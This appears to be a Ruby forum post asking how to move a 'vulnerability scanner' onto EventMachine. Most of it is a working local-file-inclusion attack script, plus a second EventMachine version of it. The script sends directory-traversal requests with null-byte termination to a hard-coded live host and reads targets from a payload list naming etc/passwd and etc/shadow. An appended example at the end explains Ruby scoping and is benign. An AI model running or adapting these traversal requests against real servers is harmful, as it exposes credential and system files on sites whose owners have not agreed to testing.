I'm working on a vulnerability scanner, basically an HTTP client... I have
a working script that only uses 'socket', but if I was using eventmachine
I would get better performance...

[working-script]
require 'socket'
my_file = File.new("log.txt", 'w')
html = File.new("log.html","w")
 IO.foreach("list.lfi") do |block|
host = 'www.i8igmac.com'     # The web server
port = 80                           # Default HTTP port
dir = "../"
mply=0
while mply < 10
# This is the HTTP request we send to fetch a file
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00 HTTP/1.1\r\n"
socket = TCPSocket.open(host,port)  # Connect to server
socket.print(request+"Host: "+host+"\r\n\r\n")               # Send request
response = socket.read              # Read complete response
# Split response at first blank line into headers and body
headers,body = response.split("\r\n\r\n", 2)
print request
#print body                          # And display it
check=body.scan("error")

mply=mply+1

if check.to_s == "error"
  print 'no inclusion'
else
  print 'Please notify site owner of exploit\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")

end
end
end
[working-script-end]


[list.lfi-----]
etc/passwd
etc/shadow
etc/cgi-bin
etc/group
etc/security/group
[end.list-----]

This script reads each line from the list, then sends out a GET request;
if a config file is found viewable to the public then this will be
logged...

This script does not handle any kind of protocol, it's more of a crude
rough draft... If I could get eventmachine to handle the protocol,
performance would increase and the script wouldn't crash...

Here is my attempt to use eventmachine...

[em-code]
require 'rubygems'
require 'eventmachine'
my_file = File.new("log.txt", 'w')
html = File.new("out.htm","w")
 IO.foreach("list.lfi") do |block|
lfihost = 'www.i8igmac.com'     # The web server
port = 80                           # Default HTTP port
dir = "../"
mply=0
while mply < 10
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00 HTTP/1.1\r\n"


 module DumbHttpClient
   def post_init
     print request
     send_data request
     @data = ""
     @parsed = false
   end

   def receive_data data
     @data << data
     headers,body = data.split("\r\n\r\n", 2)
     print data
     EventMachine::stop_event_loop
   end

 end
 EventMachine::run {
   EventMachine::connect "www.i8igmac.com", 80, DumbHttpClient
 }
 puts "The event loop has ended"



print request
#print body                          # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
  print 'no inclusion'
else
  print 'FOUND ONE\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[em-end]

Anyone with eventmachine experience could give me some help... I don't
understand why strings won't exist inside the function... clueless at this
point

-- 
Posted via http://www.ruby-forum.com/.
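On the scoping question in the post above, an added example (not the poster's code): `def` opens a new local scope in Ruby, so `request` from the surrounding loop is not visible in `post_init` and has to be handed to the handler as an argument. `FakeConnection` and `fake_connect` are hypothetical stand-ins for EventMachine's connection machinery so the snippet runs without the gem or a network; the request string and response chunks are constructed.

```ruby
request = "GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"  # constructed sample

module BrokenClient
  def post_init
    send_data request        # `def` is a scope gate: the outer local is invisible here
  end
end

module FixedClient
  attr_reader :headers, :body

  def initialize(request)    # state arrives as an argument, kept per connection
    @request = request
    @data = String.new
  end

  def post_init
    send_data @request
  end

  def receive_data(chunk)    # can fire several times per response: only buffer here
    @data << chunk
  end

  def unbind                 # peer closed the connection: now the response is whole
    @headers, @body = @data.split("\r\n\r\n", 2)
  end
end

# Hypothetical stand-in for EventMachine::Connection (assumption, not the gem).
class FakeConnection
  attr_reader :sent

  def send_data(data)
    (@sent ||= String.new) << data
  end
end

# Hypothetical stand-in for EventMachine.connect, which likewise mixes the
# handler module into a connection class and forwards extra args to initialize.
def fake_connect(handler, chunks, *args)
  conn = Class.new(FakeConnection) { include handler }.new(*args)
  conn.post_init
  chunks.each { |chunk| conn.receive_data(chunk) }
  conn.unbind
  conn
end
```

With the real gem the equivalent call is `EventMachine.connect host, port, FixedClient, request`; the response is checked in `unbind`, not after the first `receive_data`.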